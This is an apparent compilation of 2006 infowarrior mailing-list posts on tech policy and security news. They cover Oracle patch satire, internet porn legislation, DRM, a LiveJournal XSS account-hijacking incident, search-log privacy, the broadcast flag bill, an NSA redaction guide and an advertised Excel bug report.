[infowarrior] - In the interest of helping journalists cover Oracle..
(c/o Jericho) http://www.osvdb.org/blog/?p=86 In the interest of helping journalists cover Oracle.. perhaps they should just move to a templated form to save time? --- By [YOUR_NAME] [YOUR TITLE], [YOUR PUBLICATION] [DATE] Oracle released on [DAY_OF_WEEK] fixes for a [LONG/HUGE/MONSTROUS] list of security vulnerabilities in [ONE/MANY/ALL] of its products. The quarterly patch contained patches for [NUMBER] vulnerabilities. Titled Critical Patch Update, the patch provides [FIXES/REMEDIES/MITIGATION] for [NUMBER] flaws in the Database products, [NUMBER] flaws in the Application Server, [NUMBER] flaws in the COllaboration Suite, [NUMBER] of flaws in the E-Business Suite, [NUMBER] of flaws in the PeopleSoft Enterprise Portal, and [NUMBER] of flaws in the [NEW_TECHNOLOGY_OR_ACQUISITION]. Many of the flaws have been deemed critical by Oracle, meaning they are trivial to exploit, were likely discovered around 880 days ago, and are trivially abused by low to moderately skilled [HACKERS/ATTACKERS/CRACKERS]. [DULL_QUOTE_FROM_COMPANY_WHO_DISCOVERED_NONE_OF_THE_FLAWS] security company [COMPANY] said yesterday as they upped their internet risk warning system number (IRWSN) to [ARBITRARY_NUMBER]. This is another example of why our products will help protect customers who chose to deploy Oracle software [ARBITRARY_CSO_NAME] stated. [COMPLETELY_BULLSHIT_QUOTE_ABOUT_PROACTIVE_SECURITY_FROM_ORACLE countered Mary Ann Davidson, CSO at Oracle. These hackers providing us with free security testing and showing their impatience after 880 days are what causes problems. If these jackass criminals would stop being hackers, our products would not be broken into and our customers would stay safe! Oracle has been criticized for being slow to fix security flaws by everyone ranging from L0rD D1cKw4v3R to US-CERT to the Pope. You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.
[infowarrior] - Senators threaten new Net porn crackdown
Senators threaten new Net porn crackdown By Declan McCullagh http://news.com.com/Senators+threaten+new+Net+porn+crackdown/2100-1028_3-602 9005.html Story last modified Thu Jan 19 16:44:00 PST 2006 WASHINGTON--U.S. senators on Thursday blasted what they called an explosion in Internet pornography and threatened to enact new laws aimed at targeting sexually explicit Web sites. At an afternoon hearing convened here by the Senate Commerce Committee, Chairman Ted Stevens, an Alaska Republican, lashed out at an adult entertainment industry representative, saying that the industry needs to take swift moves to devise a rating system and to clearly mark all its material as adult only. I think any adult producer would agree, said Paul Cambria, counsel to the Adult Freedom Foundation, which represents companies offering lawful adult-oriented entertainment. It would just be a matter of organizing the industry, he added. My advice is you tell your clients they better do it soon, because we'll mandate it if they don't, Stevens said. Though it wasn't mentioned at the hearing, Web browsers have long supported the Internet standard called PICS, or Platform for Internet Content Selection. Internet Explorer, for instance, permits parents to disable access to Web sites rated as violent or sexually explicit. Many adult Web sites have voluntarily labeled themselves as sexually explicit. Playboy.com and Penthouse.com, for instance, rate themselves using a variant of PICS created by the nonprofit Internet Content Rating Association. In addition, mandatory rating systems have frequently been struck down by courts as an affront to the First Amendment's guarantee of freedom of expression. Judges have ruled it unconstitutional for governments to enforce the Motion Picture Association of America's movie-rating system. The Supreme Court has said that the right to speak freely encompasses the right not to speak--including the right not to be forced to self-label. Sen. Blanche Lincoln, an Arkansas Democrat, talked up her bill that she and a handful of Democrats announced last year. It proposes a 25 percent excise tax on revenue from most adult-oriented sites and a requirement that all such sites use an age-verification system. Too few adult Web sites are taking the extra step to create another obstacle, another barrier, that can keep youngsters from accessing or stumbling on pornography, Lincoln said. The proposals at Thursday's hearing were uncannily reminiscent of similar complaints from politicians a decade ago. In January 1996, Congress approved the Communications Decency Act, which was soundly rejected by the U.S. Supreme Court. Congress also approved a ban on computer-generated child pornography--which was also shot down by the justices on free-speech grounds. The hearing occurred one day after U.S. Justice Department lawyers filed paperwork in a California federal court in an attempt to force Google to turn over logs from its search engine. The reason, the Justice Department said, is to prepare for an October 2006 trial over a lawsuit from the American Civil Liberties Union challenging the Child Online Protection Act. That 1998 law, which restricts the posting of sexually explicit material deemed harmful to minors on commercial Web sites, was effectively frozen through a 2004 Supreme Court decision. The justices forwarded it back to a lower court for a full trial. On the Google case, what is your reaction to Google's position that (the Justice Department's request) is an invasion of their privacy? Sen. Daniel Innouye, the committee's top-ranking Democrat, asked Bush administration representatives. Deputy Assistant Attorney General Laura Parsky declined to comment, saying it was a dispute currently before the courts. Parsky and an FBI official applauded the idea of new laws, saying they would welcome additional tools from Congress but were doing the best with what they had now. But congressional intervention has historically provided anything but a panacea to the availability of pornography online, said Tim Lordan, executive director of the Internet Education Foundation, a nonprofit group that counts representatives from America Online, VeriSign and the World Wide Web Consortium among its board members. Sen. Inouye of Hawaii took a similarly cautious stance, pointing to a poll that said 70 percent of parents were concerned about pornography but at the same time didn't want the government to step in. My concern is that this matter has incensed members of Congress to agree that if the industry is not going to act upon it, Congress will, he said. And often times Congress does a lousy job. You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.
[infowarrior] - DRM Becomes a Balancing Act
DRM Becomes a Balancing Act By Ed Sutherland http://www.internetnews.com/stats/article.php/3578746 Companies walk a tightrope when it comes to protecting copyrighted work with Digital Rights Management (DRM), according to a new report. Sony's recent DRM fiasco highlighted the tightrope content producers are currently walking, according to Ben Macklin of eMarketer. Getting DRM right is made even more important as more people turn to the Internet for audio and video. By 2008, nearly half of U.S. broadband subscribers (76.5 million people) will use online digital content, according to eMarketer. Just 31 percent of Internet users consumed digital content in 2004. By 2010, 78 percent of U.S. households will subscribe to broadband, according to Todd Chanko, an analyst with JupiterResearch. (JupiterResearch and internetnews.com are owned by Jupitermedia.) Television remains the content king, attracting 1 billion households worldwide. New channels for broadband are emerging, with approximately 30 million broadband users, accessing online audio and video content each week in the U.S. in order to share or record digital content, according to Macklin. Content providers can either get a piece of the action, or risk having their content avoided because of tight restrictions from DRM and restrictive terms-of-service agreements, according to the report entitled Digital Rights Management: Finding the Right Balance. Used effectively, DRM technologies have the potential to open up these new channels to traditional publishers and producers, said Macklin. In November Sony recalled nearly 50 CDs after consumers charged the music giant was using a form of DRM, possibly opening computers to malware. Aside from the rootkit, Sony was being generous allowing three copies to be made, said Chanko. What mistake did Sony make when implementing a DRM for CDs? According to Chanko, it was a terrifyingly simple one. They underestimated the fallout from the impact of their DRM on people's PCs. He added that an unintended result from the Sony DRM episode may be greater attention by consumers on individual recording companies. Previously, consumers focused on the artist. You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.
[infowarrior] - Account Hijackings Force LiveJournal Changes
http://blogs.washingtonpost.com/securityfix/ Account Hijackings Force LiveJournal Changes LiveJournal, an online community that boasts nearly 2 million active members, on Thursday announced sitewide changes for users logging into their accounts -- changes prompted by a hacker group's successful hijacking of potentially hundreds of thousands of user accounts. In an alert posted to its user forum, LiveJournal said it was instituting new login procedures for users because recent changes to a popular browser have enabled malicious users to potentially gain control of your account. Company officials could not be immediately reached for comment. I also put in a query to Six Apart, which owns LiveJournal (and the service we use to produce this blog), but have yet to hear from them either. An established hacker group known as Bantown (I would not recommend visiting their site at work) claimed responsibility for the break-in, which it said was made possible due to a series of Javascript security flaws in the LiveJournal site. A trusted source in the security community put me in touch with this group, and several Bantown members spoke at length in an online instant-message chat with Security Fix. During the chat, members of the group claimed to have used the Javascript holes to hijack more than 900,000 LiveJournal accounts. (Although I quote some of them in this post, I have chosen to omit their individual hacker handles -- not because we're trying to protect their identities, but because a few of them could be considered a tad obscene.) LiveJournal's stats page says the company has more than 9.2 million registered accounts, but that only 1.9 million of them are active in some way. The largest percentage of users are located in the United States and Russia. Bantown members said they created hundreds of dummy member accounts featuring Web links that used the Javascript flaws to steal cookies (small text files on a Web-browsing computer that can be used to identify the user) from people who clicked on the links. Armed with those cookies, the hackers were then able to either log in as the victim, or arbitrarily post or delete entries on the victim's personal page. It is impossible to know how many of these are nonfunctional, but we have an 85% success rate on usage, so it may be fair to state that 85% of those are valid, one member of Bantown told Security Fix. However, we have only used approximately five hundred of these cookies so far, so it is impossible to tell whether this sample is statistically valid. Still, a massive number have been compromised. Normally, sites like LiveJournal prohibit the automated creation of accounts by using so-called captcha images, online Turing Tests that require the user to read a series of slightly malformed numbers and letters and input them into a Web site form before a new account can be created. The idea is to stymie automated programs created by spammers who try to register new accounts for the sole purpose of using them to hawk their wares. But Bantown claims to have figured out a way to subvert that test, and to have even released a free, open-source program that others could use to do the same. According to Bantown, the group has been doing this for months, and LiveJournal was only alerted to the problem after the specially crafted URLs the hackers created started setting off antivirus warnings when some users clicked on the links. What eventually led LiveJournal to discover and patch our first vulnerability is that McAfee's full [computer security] suite actually has some preliminary protection against cross-site scripting attacks, one group member said. It is unclear whether LiveJournal has managed to close the security holes that the hackers claim to have used. The company says it has, but the hackers insist there are still at least 16 other similar Javascript flaws on the LiveJournal site that could be used conduct the same attack. Group members said they plan to turn their attention to looking for similar flaws at another large social-networking site. Anytime you have large groups of computer users aggregating at such places, they are going to be seen as a target-rich environment by hackers and hacker groups. Over the past several months, a number of exploits have been released to help users or attackers circumvent the security of online forums. So far, the damage has been mostly harmless. The most high-profile case so far came in mid-October when one Myspace.com user released a self-replicating computer worm that took advantage of Javascript flaws to add more than a million fellow users to his buddy list. A similar worm hit the online community Xanga on New Year's eve (there is also some strong language at this link.) You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are
[infowarrior] - How to Foil Search Engine Snoops
How to Foil Search Engine Snoops http://www.wired.com/news/technology/1,70051-0.html By Ryan Singel | Also by this reporter On Thursday, The Mercury News reported that the Justice Department has subpoenaed search-engine records in its defense of the Child Online Protection Act, or COPA. Google, whose corporate credo famously includes the admonishment Don't Be Evil, is fighting the request for a week's worth of search engine queries. Other search engines have already complied. The government isn't asking for search engine users' identifying data -- at least not yet. But for those worried about what companies or federal investigators might do with such records in the future, here's a primer on how search logs work, and how to avoid being writ large within them. Why do search engines save logs of search terms? Search companies use logs and data-mining techniques to tune their engines and deliver focused advertising, as well to create cool features such as Google Zeitgeist. They also use them to help with local searches and return more relevant, personalized search results. How does a search engine tie a search to a user? If you have never logged in to search engine's site, or a partner service like Google's Gmail offering, the company probably doesn't know your name. But it connects your searches through a cookie, which has a unique identifying number. Using its cookies, Google will remember all searches from your browser. It might also link searches by a user's IP address. How long do cookies last? It varies. Yahoo sets a cookie that expires in June 2006. A new cookie from Google expires in 2036. What if you sign in to a service? If you sign in on Google's personalized homepage or Yahoo's homepage, the companies can then correlate your search history with any other information, such as your name, that you give them. Why should anyone worry about the government requesting search logs or bother to disguise their search history? Some people simply don't like the idea of their search history being tied to their personal lives. Others don't know what the information could be used for, but worry that the search companies could find surprising uses for that data that may invade privacy in the future. For example, if you use Google's Gmail and web optimizing software, the company could correlate everyone you've e-mailed, all the websites you've visited after a search and even all the words you misspell in queries. What's the first thing people should do who worry about their search history? Cookie management helps. Those who want to avoid a permanent record should delete their cookies at least once a week. Other options might be to obliterate certain cookies when a browser is closed and avoid logging in to other services, such as web mail, offered by a search engine. How do you do that with your browser? In Firefox, you can go into the privacy preference dialog and open Cookies. From there you can remove your search engine cookies and click the box that says: Don't allow sites that set removed cookies to set future cookies. In Safari, try the free and versatile PithHelmet plug-in. You can let some cookies in temporarily, decide that some can last longer or prohibit some sites, including third-party advertisers, from setting cookies at all. While Internet Explorer's tools are not quite as flexible, you can manage your cookies through the Tools menu by following these instructions. Have search histories ever been used to prosecute someone? Robert Petrick was convicted in November 2005 of murdering his wife, in part based on evidence that he had googled the words neck, snap and break. But police obtained his search history from an examination of his computer, not from Google. Can I see mine? Usually, no. But if you want to trace your own Google search histories and see trends, and you don't mind if the company uses the information to personalize search results, you can sign up for Google's beta search history service. Could search histories be used in civil cases? Certainly. Google may well be fighting the government simply on principle -- or, as court papers suggest, to keep outsiders from using Google's proprietary database for free. But a business case can also be made that if users knew the company regularly turned over their records wholesale to the government, they might curtail their use of the site. A related question is whether Google or any other search engine would fight a subpoena from a divorce attorney, or protest a more focused subpoena from local police who want information on someone they say is making methamphetamines. What if I want more anonymity than simply deleting my cookie when I'm searching? If you are doing any search you wouldn't print on a T-shirt, consider using Tor, The Onion Router. An EFF-sponsored service, Tor helps anonymize your web traffic by bouncing it between volunteer servers. It masks the origins and makes it easier to evade filters, such as those installed by
[infowarrior] - New Senate Broadcast Flag Bill Would Freeze Fair Use
New Senate Broadcast Flag Bill Would Freeze Fair Use January 20, 2006 http://www.eff.org/deeplinks/archives/004340.php Draft legislation making the rounds in the U.S. Senate gives us a preview of the MPAA and RIAA's next target: your television and radio. You say you want the power to time-shift and space-shift TV and radio? You say you want tomorrow's innovators to invent new TV and radio gizmos you haven't thought of yet, the same way the pioneers behind the VCR, TiVo, and the iPod did? Well, that's not what the entertainment industry has in mind. According to them, here's all tomorrow's innovators should be allowed to offer you: customary historic use of broadcast content by consumers to the extent such use is consistent with applicable law. Had that been the law in 1970, there would never have been a VCR. Had it been the law in 1990, no TiVo. In 2000, no iPod. Fair use has always been a forward-looking doctrine. It was meant to leave room for new uses, not merely customary historic uses. Sony was entitled to build the VCR first, and resolve the fair use questions in court later. This arrangement has worked well for all involved -- consumers, media moguls, and high technology companies. Now the RIAA and MPAA want to betray that legacy by passing laws that will regulate new technologies in advance and freeze fair use forever. If it wasn't a customary historic use, federal regulators will be empowered to ban the feature, prohibiting innovators from offering it. If the feature is banned, courts will never have an opportunity to pass on whether the activity is a fair use. Voila, fair use is frozen in time. We'll continue to have devices that ape the VCRs and cassette decks of the past, but new gizmos will have to be submitted to the FCC for approval, where MPAA and RIAA lobbyists can kill it in the crib. The new legislation, being circulated by Senator Gordon Smith (R-Ore.), is the first step down that path (and is eerily reminiscent of the infamous 2002 Hollings Bill). It would impose a broadcast flag mandate on all future digital TVs and radios, much like legislation discussed by the House last year. We've covered the broadcast flag and radio flag extensively in the past. These measures would impose federal regulations on all devices capable of receiving digital television and digital radio signals. What's worse, the regulations won't do a thing to stop piracy, since there are plenty of other ways to copy these broadcasts. Sen. Smith's bill would retroactively ratify the FCC's broadcast flag regulations, rejected by the courts last year. This effort to impose content protection mechanisms in all future TVs is still just as terrible an idea now as ever. The bill would also give the FCC authority to regulate the design of digital radios (both terrestrial HD Radio and XM and Sirius satellite). The bill envisions an inter-industry negotiation with a preordained outcome -- federal regulations mandating content protection mechanisms in all future HD Radio and satellite radio receivers. The FCC regulations could make room for customary historic uses of broadcast content by consumers to the extent such use is consistent with applicable law. Presumably, that means you could design a digital device just as good as an analog cassette deck, but no better. Sorry, Sen. Smith, but American innovators and music fans deserve better. You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.
[infowarrior] - NSA Guide to Sanitizing Word and PDF documents
(c/o Secrecy News) The National Security Agency has issued new guidance to assist officials in redacting (censoring) documents in Microsoft Word format and producing unclassified Adobe Portable Document (PDF) files without inadvertently disclosing sensitive information. MS Word is used throughout the DoD and the Intelligence Community (IC) for preparing documents, reports, notes, and other formal and informal materials. PDF is often used as the format for downgraded or sanitized documents. There are a number of pitfalls for the person attempting to sanitize a Word document for release. For example, As numerous people have learned to their chagrin, merely converting an MS Word document to PDF does not remove all [sensitive] metadata automatically. This paper describes the issue, and gives a step-by-step description of how to do it with confidence that inappropriate material will not be released. See Redacting with Confidence: How to Safely Publish Sanitized Reports Converted From Word to PDF, National Security Agency, December 13, 2005: http://www.fas.org/sgp/othergov/dod/nsa-redact.pdf You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.
[infowarrior] - Security Firm Offers Ad Space In Bug Report
Security Firm Offers Ad Space In Bug Report http://internetweek.cmp.com/showArticle.jhtml?articleId=177102488 By Gregg Keizer Courtesy of TechWeb News An anonymous security researcher who tried to sell an Excel vulnerability on eBay last month now stands to make more than $600 in an auction of ad space in the report issued when the bug is fixed by Microsoft. In early December, someone identified only by the eBay member name fearwall posted the spreadsheet vulnerability on the online auction service, which yanked the listing when the bidding reached $60. Microsoft later confirmed the vulnerability in Excel and said it was investigating the problem, but wouldn't commit to patching it. The researcher is now working with security company HexView, which plans to release a full analysis of the bug once Microsoft publishes a patch. The caveat: the analysis will include two 400-character text ads for products chosen by the two highest bidders in a private auction. Do not miss your chance to get noticed, HexView said in a statement posted to its Web site. Our disclosure is expected to draw the attention of many people, including your prospective customers. The ad will be published as a 400-character paragraph within the disclosure called 'You may also find interesting.' Bidding begins at $600, said HexView, and will be conducted via e-mail. The proceeds will be split between fearwall and HexView, said Max Solonski, a principal consultant with the company, in an e-mail interview. It is not 50/50, and 'fearwall' takes the greater chunk since it was his idea, said Solonski. He also seems to be obsessed with open source donations and the vast amount of the collected funds may go that way. Not even HexView is sure if the concept of advertising in a bug report is a viable way to turn vulnerability research into cash. While it seems logical to advertise products that address the vulnerability along with the description of the vulnerability, it may as well affect the image of the advertiser since vulnerability disclosures are commonly considered 'a bad thing,' said Solonski. The concept of paying for vulnerabilities, however, isn't new. Better known security companies such as iDefense (part of VeriSign) and TippingPoint (part of 3Com) pay bounties on bugs reported to their research teams, and crow when the program bears fruit. You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.
[infowarrior] - NSA Guide to Sanitizing Word and PDF documents
(c/o Secrecy News) The National Security Agency has issued new guidance to assist officials in redacting (censoring) documents in Microsoft Word format and producing unclassified Adobe Portable Document (PDF) files without inadvertently disclosing sensitive information. MS Word is used throughout the DoD and the Intelligence Community (IC) for preparing documents, reports, notes, and other formal and informal materials. PDF is often used as the format for downgraded or sanitized documents. There are a number of pitfalls for the person attempting to sanitize a Word document for release. For example, As numerous people have learned to their chagrin, merely converting an MS Word document to PDF does not remove all [sensitive] metadata automatically. This paper describes the issue, and gives a step-by-step description of how to do it with confidence that inappropriate material will not be released. See Redacting with Confidence: How to Safely Publish Sanitized Reports Converted From Word to PDF, National Security Agency, December 13, 2005: http://www.fas.org/sgp/othergov/dod/nsa-redact.pdf You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners.